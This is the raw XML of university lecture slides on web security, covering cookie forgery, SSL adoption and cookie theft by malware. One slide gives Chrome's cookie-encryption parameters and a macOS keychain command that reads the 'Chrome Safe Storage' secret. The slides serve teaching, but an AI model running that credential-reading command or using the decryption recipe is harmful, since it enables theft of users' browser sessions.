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83" r:id="rId3"/>
    <p:sldId id="284" r:id="rId4"/>
    <p:sldId id="285" r:id="rId5"/>
    <p:sldId id="286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0007"/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49" autoAdjust="0"/>
    <p:restoredTop sz="89597" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="44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4/29/18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4/29/18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78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www.cvedetails.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities-by-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>types.php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96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https://www2.trustwave.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2017:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 85.9%, 21%, 25.3%, 35.9%,18.8%,1.8% (from 2018 report)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14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trends.builtwith.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/SSL-by-Default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2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February 2017, Yahoo announced that 32 million accounts had been compromised by successful cookie forging.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20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scripts can be imported from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> remote origins, have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>privilieges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of imported page (not source)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4/29/18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58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ysClr val="windowText" lastClr="000000"/>
              </a:gs>
              <a:gs pos="80000">
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="2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lin ang="13500000" scaled="1"/>
            <a:tileRect/>
          </a:gra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7F0007">
                  <a:alpha val="67059"/>
                </a:srgb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4/29/18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wmf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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><Relationship Id="rId6" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId6" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2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CS 5430		       			         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/2/2018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2"/>
            <a:ext cx="7848600" cy="631825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Lecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>26: Web Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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3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SSL by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default (top 10k)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17" y="1600200"/>
            <a:ext cx="6670565" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3941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 Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="C:\Users\eleanor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SJXY5CEI\MC90043593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12" y="2180410"/>
            <a:ext cx="1838325" cy="14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12" y="2036064"/>
            <a:ext cx="1999488" cy="201168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182112" y="2514600"/>
            <a:ext cx="2895600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0">
                <a:alpha val="25098"/>
              </a:srgb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87194" y="21452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1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL(login)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C1C1C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82112" y="2907485"/>
            <a:ext cx="2895600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0">
                <a:alpha val="25098"/>
              </a:srgbClr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53889" y="2538153"/>
            <a:ext cx="272382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1C1C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL(redirect; set-cookie)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C1C1C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197352" y="3311162"/>
            <a:ext cx="28956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10712" y="2941830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Request; cookie=SSID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 Forgery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2209800"/>
            <a:ext cx="6286500" cy="3057525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72752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 Theft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Malware sometimes t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>argets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>local  browser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95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Chrome Encrypted Cookies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salt is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>saltysalt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>key length is 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iv is 16 bytes of space b' ' * 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on Mac OSX:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>keychain: security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>find-generic-password -w -s "Chrome Safe Storage"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1003 iterations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on Chrome OS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password is in keychain: "security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>find-generic-password -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chrome”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1003 iterations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password is peanuts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 iteration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password is current user password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptProtectData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> uses 4000 iterations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53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Vulnerability Occurrence in Applications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76200" y="1551708"/>
            <a:ext cx="7924800" cy="4940531"/>
            <a:chOff x="76200" y="1551708"/>
            <a:chExt cx="7924800" cy="4940531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Content Placeholder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800" b="61092"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="2405959"/>
              <a:ext cx="7924800" cy="786128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Content Placeholder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61" b="78028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1551708"/>
              <a:ext cx="7924800" cy="854251"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Content Placeholder 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2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052" b="43200"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="3200400"/>
              <a:ext cx="7924800" cy="1720735"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Content Placeholder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286" b="27209"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4887883"/>
              <a:ext cx="7924800" cy="160435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6705600" y="5257800"/>
            <a:ext cx="1614024" cy="1066606"/>
            <a:chOff x="6477000" y="3028927"/>
            <a:chExt cx="1614024" cy="1066606"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6477000" y="3124200"/>
              <a:ext cx="801244" cy="876060"/>
              <a:chOff x="7675224" y="3423138"/>
              <a:chExt cx="291673" cy="344660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Content Placeholder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18" t="14740" r="70725" b="83818"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3423138"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Content Placeholder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37" t="17034" r="70306" b="81524"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675951" y="3560299"/>
                <a:ext cx="290946" cy="70338"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Content Placeholder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07" t="19263" r="70236" b="79295"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7675224" y="3697460"/>
                <a:ext cx="290946" cy="70338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7393396" y="3028927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2013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93397" y="3377564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2014</a:t>
              </a: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91400" y="3726201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2015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5271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dirty="0"/>
              <a:t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xmlns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="http://www.w3.org/1999/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>xhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>meta http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="content-type" content="text/html; charset=utf-8" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>title&gt;CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>5430 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>2018: System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Security&lt;/title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="stylesheet" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>style.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="shortcut icon" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>www.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>favicon.ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>id="canvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div id="header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div id="info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>www.cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/courses/cs5430/2018sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>span class="title"&gt;CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>5430&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>		                      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>span </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="subtitle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>"&gt;System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Security&lt;/span&gt;&lt;/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div id="logo"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>www.cs.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>cslogo.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>" alt="Cornell Computer Science" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/&gt;&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>end header-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
